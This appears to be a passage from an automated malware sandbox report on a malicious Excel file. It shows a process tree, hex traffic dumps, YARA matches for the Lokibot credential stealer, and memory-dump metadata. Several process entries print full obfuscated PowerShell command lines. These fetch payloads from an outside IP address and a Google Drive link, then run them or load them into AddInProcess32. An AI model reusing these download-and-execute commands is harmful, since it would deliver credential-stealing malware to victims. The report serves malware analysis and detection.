                                                                                              2024-10-24 19:23:06 UTC1378INData Raw: 88 d4 12 59 54 13 5b be 27 af c8 e2 ad b4 01 4a 40 bc d0 d5 13 ac 08 c8 d1 88 d5 76 ae f9 94 33 72 c4 96 05 ae c9 e4 7e 43 e2 b0 d3 48 83 99 74 f4 7b 79 e9 ff 00 ab 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6 e7
                                                                                              Data Ascii: YT['J@v3r~CHt{y2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,
                                                                                              2024-10-24 19:23:06 UTC1378INData Raw: 1a af 0a 7d 3c 28 c5 9a 49 e5 7f c2 ab ba 8d 73 df 03 23 cb 74 9c 30 7b 46 1e a5 6e c7 e1 84 49 e5 8c 32 a3 6d 0c a5 58 fb 8b bc 31 d3 ba 30 66 46 a2 0d 6e 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d e2
                                                                                              Data Ascii: }<(Is#t0{FnI2mX10fFn]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#}
                                                                                              2024-10-24 19:23:06 UTC1378INData Raw: ea 1c 74 00 05 ac 0c 9f b3 cc 90 78 d7 da 68 22 d6 ab 38 f0 89 e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5 28
                                                                                              Data Ascii: txh"8XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De(
                                                                                              2024-10-24 19:23:06 UTC1378INData Raw: 1d b0 d0 a2 e9 d0 24 67 8e a4 62 b1 6a 36 30 0e 9b bb 59 ca c9 29 56 2c ad c9 e8 30 0c 1d 9a 6a 0e a2 8d 73 91 3f 98 ac a4 b2 d0 3e aa 1d 46 26 67 31 a3 3c 8a a3 6f 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91 74 e8
                                                                                              Data Ascii: $gbj60Y)V,0js?>F&g1<o7h|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&*Uk(5-TzZe0EDgO8)F@z:N*]LV,hRO-Tt


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:15:22:13
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                              Imagebase:0x13f100000
                                                                                              File size:28'253'536 bytes
                                                                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:4
                                                                                              Start time:15:22:36
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                              Imagebase:0x13f300000
                                                                                              File size:13'824 bytes
                                                                                              MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:15:22:43
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"
                                                                                              Imagebase:0x13f0f0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:8
                                                                                              Start time:15:22:48
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe
                                                                                              Imagebase:0x13f0f0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:9
                                                                                              Start time:15:22:51
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline"
                                                                                              Imagebase:0x13f4b0000
                                                                                              File size:2'758'280 bytes
                                                                                              MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:10
                                                                                              Start time:15:22:51
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB606.tmp" "c:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP"
                                                                                              Imagebase:0x13f140000
                                                                                              File size:52'744 bytes
                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:12
                                                                                              Start time:15:22:57
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS"
                                                                                              Imagebase:0xffbf0000
                                                                                              File size:168'960 bytes
                                                                                              MD5 hash:045451FA238A75305CC26AC982472367
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:13
                                                                                              Start time:15:22:57
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                              Imagebase:0x13f0f0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:15
                                                                                              Start time:15:22:57
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"
                                                                                              Imagebase:0x13f0f0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:16
                                                                                              Start time:15:23:23
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                              Imagebase:0xb70000
                                                                                              File size:42'056 bytes
                                                                                              MD5 hash:EFBCDD2A3EBEA841996AEF00417AA958
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000010.00000002.621074045.0000000000900000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Has exited:false

                                                                                              Call Graph

                                                                                              • Entrypoint
                                                                                              • Decryption Function
                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              • Show Help
                                                                                              callgraph 1 Error: Graph is empty

                                                                                              Module: Sheet1

                                                                                              Declaration
                                                                                              LineContent
                                                                                              1

                                                                                              Attribute VB_Name = "Sheet1"

                                                                                              2

                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                              3

                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                              4

                                                                                              Attribute VB_Creatable = False

                                                                                              5

                                                                                              Attribute VB_PredeclaredId = True

                                                                                              6

                                                                                              Attribute VB_Exposed = True

                                                                                              7

                                                                                              Attribute VB_TemplateDerived = False

                                                                                              8

                                                                                              Attribute VB_Customizable = True

                                                                                              Module: Sheet2

                                                                                              Declaration
                                                                                              LineContent
                                                                                              1

                                                                                              Attribute VB_Name = "Sheet2"

                                                                                              2

                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                              3

                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                              4

                                                                                              Attribute VB_Creatable = False

                                                                                              5

                                                                                              Attribute VB_PredeclaredId = True

                                                                                              6

                                                                                              Attribute VB_Exposed = True

                                                                                              7

                                                                                              Attribute VB_TemplateDerived = False

                                                                                              8

                                                                                              Attribute VB_Customizable = True

                                                                                              Module: Sheet3

                                                                                              Declaration
                                                                                              LineContent
                                                                                              1

                                                                                              Attribute VB_Name = "Sheet3"

                                                                                              2

                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                              3

                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                              4

                                                                                              Attribute VB_Creatable = False

                                                                                              5

                                                                                              Attribute VB_PredeclaredId = True

                                                                                              6

                                                                                              Attribute VB_Exposed = True

                                                                                              7

                                                                                              Attribute VB_TemplateDerived = False

                                                                                              8

                                                                                              Attribute VB_Customizable = True

                                                                                              Module: ThisWorkbook

                                                                                              Declaration
                                                                                              LineContent
                                                                                              1

                                                                                              Attribute VB_Name = "ThisWorkbook"

                                                                                              2

                                                                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                              3

                                                                                              Attribute VB_GlobalNameSpace = False

                                                                                              4

                                                                                              Attribute VB_Creatable = False

                                                                                              5

                                                                                              Attribute VB_PredeclaredId = True

                                                                                              6

                                                                                              Attribute VB_Exposed = True

                                                                                              7

                                                                                              Attribute VB_TemplateDerived = False

                                                                                              8

                                                                                              Attribute VB_Customizable = True

                                                                                              Reset < >
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000003.417424395.0000000002AF0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_3_2af0000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                • Instruction ID: e399129e48a0335aaac0554db5bea46f3af7e3dff27cdb45dc64c7837d9b8ee2
                                                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000003.417424395.0000000002AF0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_3_2af0000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                • Instruction ID: e399129e48a0335aaac0554db5bea46f3af7e3dff27cdb45dc64c7837d9b8ee2
                                                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000003.417424395.0000000002AF0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_3_2af0000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                • Instruction ID: e399129e48a0335aaac0554db5bea46f3af7e3dff27cdb45dc64c7837d9b8ee2
                                                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                • Instruction Fuzzy Hash:

                                                                                                Execution Graph

                                                                                                Execution Coverage:5.4%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:50%
                                                                                                Total number of Nodes:6
                                                                                                Total number of Limit Nodes:0
                                                                                                execution_graph 2010 7fe899b4b18 2011 7fe899b5a30 URLDownloadToFileW 2010->2011 2013 7fe899b5b00 2011->2013 2006 7fe899b59e1 2007 7fe899b59f1 URLDownloadToFileW 2006->2007 2009 7fe899b5b00 2007->2009

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.457565932.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7fe899b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: DownloadFile
                                                                                                • String ID:
                                                                                                • API String ID: 1407266417-0
                                                                                                • Opcode ID: 30b8ab4f51c219e7052957f59ea5faf73a70b48aaaeb12f770eab4cad72a21d7
                                                                                                • Instruction ID: 70a912e6180708a489c5a413acad5a672dde47a77dba218a613ca7f1de2d922a
                                                                                                • Opcode Fuzzy Hash: 30b8ab4f51c219e7052957f59ea5faf73a70b48aaaeb12f770eab4cad72a21d7
                                                                                                • Instruction Fuzzy Hash: 32319131918A5C8FDB58EF5C98857A9B7E0FB59711F00822ED04EE3661CB74B806CB81

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.457565932.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
